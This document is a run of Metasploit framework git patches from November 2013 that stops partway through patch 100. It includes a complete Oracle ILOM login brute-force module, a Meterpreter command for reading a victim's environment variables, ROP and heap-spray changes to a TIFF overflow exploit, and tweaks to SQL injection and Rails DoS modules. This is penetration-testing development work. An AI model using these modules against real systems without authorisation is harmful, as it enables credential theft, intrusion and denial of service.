diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb
index 653e316934..45e976e925 100644
--- a/modules/post/windows/gather/word_unc_injector.rb
+++ b/modules/post/windows/gather/word_unc_injector.rb
@@ -18,8 +18,8 @@ class Metasploit3 < Msf::Post
       'Description'    => %q{
           This module modifies a remote .docx file that will, upon opening, submit
         stored netNTLM credentials to a remote host. Verified to work with Microsoft
-        Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes
-        the auxiliary/server/capture/smb module can be used.
+        Word 2003, 2007, 2010, and 2013. In order to get the hashes the
+        auxiliary/server/capture/smb module can be used.
       },
       'License'        => MSF_LICENSE,
       'References'     =>

From a03cfce74c45e57ae5a08aaa3f5e8b190594be20 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 25 Nov 2013 17:44:26 +1030
Subject: [PATCH 084/217] Add table prefix and doc root as fallback options

---
 modules/exploits/unix/webapp/kimai_sqli.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb
index 91035980fb..140b4aff05 100644
--- a/modules/exploits/unix/webapp/kimai_sqli.rb
+++ b/modules/exploits/unix/webapp/kimai_sqli.rb
@@ -54,7 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
       register_options(
         [
           OptString.new('TARGETURI',  [true,  'The base path to Kimai', '/kimai/']),
-          OptString.new('TARGETPATH', [false, 'The path to the web server document root directory', '/var/www/'])
+          OptString.new('FALLBACK_TARGET_PATH', [false, 'The path to the web server document root directory', '/var/www/']),
+          OptString.new('FALLBACK_TABLE_PREFIX', [false, 'The MySQL table name prefix string for Kimai tables', 'kimai_'])
         ], self.class)
   end
 
@@ -90,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       path = "#{$1}"
       print_good("#{peer} - Found file system path: #{path}")
     else
-      path = normalize_uri(datastore['TARGETPATH'], target_uri.path)
+      path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path)
       print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'")
     end
 
@@ -103,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
       table_prefix = "#{prefixes.flatten.last}"
       print_good("#{peer} - Found table name prefix: #{table_prefix}")
     else
-      table_prefix = 'kimai_'
+      table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path)
       print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'")
     end
 

From e157ff73d3e07e1d9fc9fe80ded35c441bb779f1 Mon Sep 17 00:00:00 2001
From: Karn Ganeshen <KarnGaneshen@gmail.com>
Date: Mon, 25 Nov 2013 13:55:31 +0530
Subject: [PATCH 085/217] Oracle ILOM Login utility

---
 .../scanner/http/oracle_ilom_login.rb         | 115 ++++++++++++++++++
 1 file changed, 115 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/oracle_ilom_login.rb

diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
new file mode 100644
index 0000000000..780942e40a
--- /dev/null
+++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Oracle ILO Manager Login Utility',
+      'Description'    => %{
+        This module scans for Oracle Integrated Lights Out Manager login portal, and performs login brute force
+        to identify valid credentials.
+      },
+      'Author'         =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+        ],
+      'License'        => MSF_LICENSE
+
+    ))
+
+    register_options(
+      [
+        OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
+        Opt::RPORT(443)
+      ], self.class)
+  end
+
+  def run_host(ip)
+    unless is_app_oilom?
+      return
+    end
+
+    print_status("#{peer} - Starting login brute force...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  #
+  # What's the point of running this module if the target actually isn't Oracle ILOM
+  #
+
+  def is_app_oilom?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/iPages/i_login.asp',
+        'method'    => 'GET'	
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager"))
+      vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...")
+      return true
+    else
+      vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/iPages/loginProcessor.asp',
+        'method'    => 'POST',
+        'vars_post' =>
+          {
+            'sclink' => '',
+            'username' => user,
+            'password' => pass,
+            'button' => 'Log+In'
+          }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") or res.body.include?("SetWebSessionString"))
+      print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+      report_hash = {
+        :host   => rhost,
+        :port   => rport,
+        :sname  => 'Oracle Integrated Lights Out Manager Portal',
+        :user   => user,
+        :pass   => pass,
+        :active => true,
+        :type => 'password'
+      }
+      report_auth_info(report_hash)
+      return :next_user
+    else
+      vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+    end
+
+  end
+end

From cc60ca2e2a3b397a33a0adcb746cccfe0f2b992d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 25 Nov 2013 09:33:43 -0600
Subject: [PATCH 086/217] Fix module title

---
 modules/auxiliary/scanner/http/openmind_messageos_login.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb
index 1d1f47a993..bb572d898b 100644
--- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb
+++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'OpenMind Message-OS Portal Login Utility',
+      'Name'           => 'OpenMind Message-OS Portal Login Brute Force Utility',
       'Description'    => %{
         This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force
         to identify valid credentials.

From 764fd09cc3d3e85b7001cd79fcb8d618cdeef9d8 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 25 Nov 2013 10:26:51 -0600
Subject: [PATCH 087/217] Increase duration timeout task manager

Sometimes, Jenkins or Travis is slow, and can't hit that 1 second
timeout. This increases to 5 seconds to account for local slowness.
---
 spec/lib/msf/core/task_manager_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/lib/msf/core/task_manager_spec.rb b/spec/lib/msf/core/task_manager_spec.rb
index f6aec76e55..3271df1741 100644
--- a/spec/lib/msf/core/task_manager_spec.rb
+++ b/spec/lib/msf/core/task_manager_spec.rb
@@ -78,7 +78,7 @@ describe Msf::TaskManager do
     t.wait
 
     t.status.should == :timeout
-    t.duration.should <= 1.0
+    t.duration.should <= 5.0
   end
 
   it "should handle task exceptions" do

From f311b0cd1e4117c27b081722d99bb8d2475627f0 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 25 Nov 2013 12:29:05 -0600
Subject: [PATCH 088/217] Add user-controlled verbs.

GET, HEAD, POST, and PROPFIND were tested on WebRick, all successful.
---
 modules/auxiliary/dos/http/rails_json_float_dos.rb | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb
index 24789e0da1..7596746e3e 100644
--- a/modules/auxiliary/dos/http/rails_json_float_dos.rb
+++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb
@@ -36,7 +36,8 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Nov 22 2013'))
     register_options(
       [
-        OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/'])
+        OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),
+        OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])
       ], self.class)
   end
 
@@ -44,6 +45,10 @@ class Metasploit3 < Msf::Auxiliary
     normalize_uri(target_uri.path.to_s)
   end
 
+  def verb
+    datastore['HTTPVERB'] || 'POST'
+  end
+
   def digit_pattern
     @digit_pattern ||= rand(10_000).to_s
   end
@@ -74,13 +79,13 @@ class Metasploit3 < Msf::Auxiliary
     sploit = '['
     sploit << evil_float_string
     sploit << ']'
-    print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} request to #{uri}"
+    print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"
     target_available = true
 
     begin
       res = send_request_cgi(
         {
-          'method'  => 'POST',
+          'method'  => verb,
           'uri'     => uri,
           'ctype'   => "application/json",
           'data'    => sploit
@@ -101,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
     print_status "#{peer} - Checking availability"
     begin
       res = send_request_cgi({
-        'method' => 'POST',
+        'method' => verb,
         'uri' => uri,
         'ctype' => "application/json",
         'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json

From 23448b58e7c4f5de828528e7203c664a3d4d53fd Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 25 Nov 2013 12:37:23 -0600
Subject: [PATCH 089/217] Remove timeout checkers that are rescued anyway

---
 modules/auxiliary/dos/http/rails_json_float_dos.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb
index 7596746e3e..7a32e8b80e 100644
--- a/modules/auxiliary/dos/http/rails_json_float_dos.rb
+++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb
@@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
     rescue ::Rex::HostUnreachable
       print_error "#{peer} - Unable to connect. (Host unreachable)"
       target_available = false
-    rescue ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+    rescue ::Rex::ConnectionTimeout
       print_error "#{peer} - Unable to connect. (Timeout)"
       target_available = false
     end
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
         print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"
         target_available = false
       end
-    rescue ::Rex::ConnectionError, ::Timeout::Error, ::Errno::EPIPE, Errno::ECONNRESET
+    rescue ::Rex::ConnectionError, Errno::ECONNRESET
       print_good "#{peer} - DoS appears successful (Host unreachable)"
       target_available = false
     end

From 385381cde2e44b0c7ae89f0975fce65249c5101b Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 25 Nov 2013 17:21:39 -0600
Subject: [PATCH 090/217] Change target address

This one tends to work better with our boxes
---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 9290d0b3b8..8007743d1e 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Gain control of the call [eax+50h] instruction
     # XCHG EAX, ESP; RETN msvcrt
-    buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
+    buf[0x4874, 4] = [0x12dd0700-0x50].pack('V')
 
     buf
   end
@@ -148,9 +148,6 @@ class Metasploit3 < Msf::Exploit::Remote
   # Generates a payload
   #
   def get_rop_payload
-    # Target address (200F0700):
-    # 0:000> dd  200f06fc L4
-    # 200f06fc  ffffffff 36643ab8 d9c0d946 5af42474
     p = ''
     p << [0x77c15ed5].pack('V') # XCHG EAX, ESP  msvcrt
     p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
@@ -235,7 +232,7 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0xfffffffe].pack('V')
     mscd << [0xffffffff].pack('V') * 32 #52
     mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
-    mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
+    mscd << [0x12dd0704].pack('V') # Final payload target address to begin the ROP
     mscd << [0xffffffff].pack('V') * 18
     mscd << @rop_payload
 

From 1a655660057298ae04c0df991656f19ff20dc67d Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 26 Nov 2013 10:05:50 +1000
Subject: [PATCH 091/217] Add the getenv command which pulls env vars from the
 victim

This command will allow the attacker to grab environment variables from the
target, if they exist. Calling this function allows for one or more values
to be passed in, which should match the name of the variable required. If
the variable is found, it is returned. If it is not found, the variable
is not returned (ie. it's not present in the resulting hash).

Note 1: POSIX environment vars are case-senstive, whereas Windows is not.
Note 2: POSIX doesn't seem to cough up user environment vars, it only returns
system vars. I'm not sure why this is, but it could be because of the way
we do linking on POSIX.
---
 .../extensions/stdapi/sys/config.rb           | 23 ++++++++++++++++
 .../post/meterpreter/extensions/stdapi/tlv.rb |  5 ++++
 .../console/command_dispatcher/stdapi/sys.rb  | 26 +++++++++++++++++++
 3 files changed, 54 insertions(+)

diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
index 2e02131fe6..1645f97bba 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
@@ -33,6 +33,29 @@ class Config
     return client.unicode_filter_encode( response.get_tlv_value(TLV_TYPE_USER_NAME) )
   end
 
+  #
+  # Returns a hash of requested environment variables, along with their values.
+  # If a requested value doesn't exist in the response, then the value wasn't found.
+  #
+  def getenv(var_names)
+    request = Packet.create_request('stdapi_sys_config_getenv')
+
+    var_names.each do |v|
+      request.add_tlv(TLV_TYPE_ENV_VARIABLE, v)
+    end
+
+    response = client.send_request(request)
+    result = {}
+
+    response.each(TLV_TYPE_ENV_GROUP) do |env|
+      var_name = env.get_tlv_value(TLV_TYPE_ENV_VARIABLE)
+      var_value = env.get_tlv_value(TLV_TYPE_ENV_VALUE)
+      result[var_name] = var_value
+    end
+
+    return result
+  end
+
   #
   # Returns a hash of information about the remote computer.
   #
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 4c7cbb5dde..a20b0b1993 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -117,6 +117,11 @@ TLV_TYPE_USER_NAME          = TLV_META_TYPE_STRING  | 1042
 TLV_TYPE_ARCHITECTURE       = TLV_META_TYPE_STRING  | 1043
 TLV_TYPE_LANG_SYSTEM        = TLV_META_TYPE_STRING  | 1044
 
+# Environment
+TLV_TYPE_ENV_VARIABLE       = TLV_META_TYPE_STRING  | 1100
+TLV_TYPE_ENV_VALUE          = TLV_META_TYPE_STRING  | 1101
+TLV_TYPE_ENV_GROUP          = TLV_META_TYPE_GROUP   | 1102
+
 DELETE_KEY_FLAG_RECURSIVE   = (1 << 0)
 
 # Process
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index ca95bbf438..e809b4c406 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -88,6 +88,7 @@ class Console::CommandDispatcher::Stdapi::Sys
       "getpid"      => "Get the current process identifier",
       "getprivs"    => "Attempt to enable all privileges available to the current process",
       "getuid"      => "Get the user that the server is running as",
+      "getenv"      => "Get one or more environment variable values",
       "kill"        => "Terminate a process",
       "ps"          => "List running processes",
       "reboot"      => "Reboots the remote computer",
@@ -106,6 +107,7 @@ class Console::CommandDispatcher::Stdapi::Sys
       "getpid"      => [ "stdapi_sys_process_getpid"  ],
       "getprivs"    => [ "stdapi_sys_config_getprivs" ],
       "getuid"      => [ "stdapi_sys_config_getuid" ],
+      "getenv"      => [ "stdapi_sys_config_getenv" ],
       "kill"        => [ "stdapi_sys_process_kill" ],
       "ps"          => [ "stdapi_sys_process_get_processes" ],
       "reboot"      => [ "stdapi_sys_power_exitwindows" ],
@@ -277,6 +279,30 @@ class Console::CommandDispatcher::Stdapi::Sys
     print_line("Server username: #{client.sys.config.getuid}")
   end
 
+  def cmd_getenv(*args)
+    vars = client.sys.config.getenv(args)
+
+    if vars.length == 0
+      print_error("None of the specified environment variables were found/set.")
+    else
+      table = Rex::Ui::Text::Table.new(
+        'Header'    => 'Environment Variables',
+        'Indent'    => 0,
+        'SortIndex' => 1,
+        'Columns'   => [
+          'Variable', 'Value'
+        ]
+      )
+
+      vars.each do |var, val|
+        table << [ var, val ]
+      end
+
+      print_line
+      print_line(table.to_s)
+    end
+  end
+
   #
   # Clears the event log
   #

From 4c249bb6e90c804e5d43896992310ad04b6db43b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 25 Nov 2013 20:06:42 -0600
Subject: [PATCH 092/217] Fix heap spray

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 9290d0b3b8..b9c2f5e871 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -156,7 +156,9 @@ class Metasploit3 < Msf::Exploit::Remote
     p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
     p << payload.encoded
     block  = p
-    block << rand_text_alpha(1024 - p.length)
+    block << rand_text_alpha(1024 - 80 - p.length)
+    block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt
+    block << rand_text_alpha(1024 - block.length)
 
     buf = ''
     while (buf.length < 0x80000)

From fa97c9fa7ccb6e897911e541d673afe72a9a0f40 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 25 Nov 2013 20:54:39 -0600
Subject: [PATCH 093/217] Revert this change

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index cd6568e5d9..39d01a8a2f 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0xfffffffe].pack('V')
     mscd << [0xffffffff].pack('V') * 32 #52
     mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
-    mscd << [0x12dd0704].pack('V') # Final payload target address to begin the ROP
+    mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
     mscd << [0xffffffff].pack('V') * 18
     mscd << @rop_payload
 

From 0079413e81e6ef291aea497be8710527132b6659 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 25 Nov 2013 22:04:02 -0600
Subject: [PATCH 094/217] Full revert the change

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 39d01a8a2f..deeddd19e6 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Gain control of the call [eax+50h] instruction
     # XCHG EAX, ESP; RETN msvcrt
-    buf[0x4874, 4] = [0x12dd0700-0x50].pack('V')
+    buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
 
     buf
   end

From 70139d05ea84687c972f20dd513d1c493caefe42 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 25 Nov 2013 22:46:35 -0600
Subject: [PATCH 095/217] Fix missed title

---
 modules/payloads/singles/cmd/windows/reverse_perl.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb
index df595e92c0..0d402f40c1 100644
--- a/modules/payloads/singles/cmd/windows/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb
@@ -15,7 +15,7 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command, Double Reverse TCP connection (via Perl)',
+      'Name'          => 'Windows Command, Double Reverse TCP Connection (via Perl)',
       'Description'   => 'Creates an interactive shell via perl',
       'Author'        => ['cazz', 'patrick'],
       'License'       => BSD_LICENSE,

From 253719d70c3a41c08b64090851334b426f95e486 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 Nov 2013 08:11:29 -0600
Subject: [PATCH 096/217] Fix title

---
 .../windows/browser/ms13_022_silverlight_script_object.rb       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
index ca6306e47b..6b2ee8a618 100644
--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",
+      'Name'           => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
       'Description'    => %q{
         This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on
         the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an

From 9dbeb55b9a5accfb5cef4737d9976cba234b9568 Mon Sep 17 00:00:00 2001
From: jonvalt <>
Date: Tue, 26 Nov 2013 10:29:38 -0600
Subject: [PATCH 097/217] removed single quotes from inside %q{} on line 22 per
 https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7913331

removed empty advanced options registration on line 28 per https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7913342
---
 .../post/windows/gather/forensics/gather_browser_history.rb    | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index a1f211ce31..a801dcd48a 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -19,13 +19,12 @@ class Metasploit3 < Msf::Post
   def initialize(info={})
     super( update_info( info,
         'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
-        'Description' => %q{'Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.'},
+        'Description' => %q{Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.},
         'License' => MSF_LICENSE,
         'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>'],
         'Platform' => %w{ win },
         'SessionTypes' => [ 'meterpreter' ]
       ))
-    register_advanced_options([], self.class)
   end
 
   def run

From c7d4cd9be28db8074efefe70f6e6c2d5b6faefb3 Mon Sep 17 00:00:00 2001
From: Tab Assassin <tabassassin@metasploit.com>
Date: Tue, 26 Nov 2013 10:48:50 -0600
Subject: [PATCH 098/217] Fix indendation on Gemfile

---
 Gemfile | 66 ++++++++++++++++++++++++++++-----------------------------
 1 file changed, 33 insertions(+), 33 deletions(-)

diff --git a/Gemfile b/Gemfile
index 0f0282ae07..26b450c436 100755
--- a/Gemfile
+++ b/Gemfile
@@ -14,50 +14,50 @@ gem 'robots'
 gem 'packetfu', '1.1.9'
 
 group :db do
-	# Needed for Msf::DbManager
-	gem 'activerecord'
-	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.16.6'
-	# Needed for module caching in Mdm::ModuleDetails
-	gem 'pg', '>= 0.11'
+  # Needed for Msf::DbManager
+  gem 'activerecord'
+  # Database models shared between framework and Pro.
+  gem 'metasploit_data_models', '~> 0.16.6'
+  # Needed for module caching in Mdm::ModuleDetails
+  gem 'pg', '>= 0.11'
 end
 
 group :pcap do
   gem 'network_interface', '~> 0.0.1'
-	# For sniffer and raw socket modules
-	gem 'pcaprub'
+  # For sniffer and raw socket modules
+  gem 'pcaprub'
 end
 
 group :development do
-	# Markdown formatting for yard
-	gem 'redcarpet'
-	# generating documentation
-	gem 'yard'
+  # Markdown formatting for yard
+  gem 'redcarpet'
+  # generating documentation
+  gem 'yard'
 end
 
 group :development, :test do
-	# supplies factories for producing model instance for specs
-	# Version 4.1.0 or newer is needed to support generate calls without the
-	# 'FactoryGirl.' in factory definitions syntax.
-	gem 'factory_girl', '>= 4.1.0'
-# Make rspec output shorter and more useful
-	gem 'fivemat', '1.2.1'
-	# running documentation generation tasks and rspec tasks
-	gem 'rake', '>= 10.0.0'
+  # supplies factories for producing model instance for specs
+  # Version 4.1.0 or newer is needed to support generate calls without the
+  # 'FactoryGirl.' in factory definitions syntax.
+  gem 'factory_girl', '>= 4.1.0'
+  # Make rspec output shorter and more useful
+  gem 'fivemat', '1.2.1'
+  # running documentation generation tasks and rspec tasks
+  gem 'rake', '>= 10.0.0'
 end
 
 group :test do
-	# Removes records from database created during tests.  Can't use rspec-rails'
-	# transactional fixtures because multiple connections are in use so
-	# transactions won't work.
-	gem 'database_cleaner'
-	# testing framework
-	gem 'rspec', '>= 2.12'
-	gem 'shoulda-matchers'
-	# code coverage for tests
-	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
-	gem 'simplecov', '0.5.4', :require => false
-	# Manipulate Time.now in specs
-	gem 'timecop'
+  # Removes records from database created during tests.  Can't use rspec-rails'
+  # transactional fixtures because multiple connections are in use so
+  # transactions won't work.
+  gem 'database_cleaner'
+  # testing framework
+  gem 'rspec', '>= 2.12'
+  gem 'shoulda-matchers'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
+  gem 'simplecov', '0.5.4', :require => false
+  # Manipulate Time.now in specs
+  gem 'timecop'
 end

From 671c0d94734362c5485a86a5cb1887dfae152d38 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 26 Nov 2013 10:52:35 -0600
Subject: [PATCH 099/217] Fix nokogiri typo

[SeeRM #8730]
---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index deeddd19e6..777f87a872 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'rex/zip'
-require 'Nokogiri'
+require 'nokogiri'
 
 module ::Nokogiri
 module XML

From 5d10b444309ba2e07621a15ef318062e032bc32f Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 26 Nov 2013 14:47:27 -0600
Subject: [PATCH 100/217] Add support for Silverlight

Add support for Silverlight exploitation. [SeeRM #8705]
---
 data/js/detect/misc_addons.js                 | 46 +++++++++++++++++++
 .../exploit/remote/browser_exploit_server.rb  | 38 +++++++--------
 lib/rex/exploitation/js/detect.rb             |  1 +
 .../ms13_022_silverlight_script_object.rb     | 11 +++--
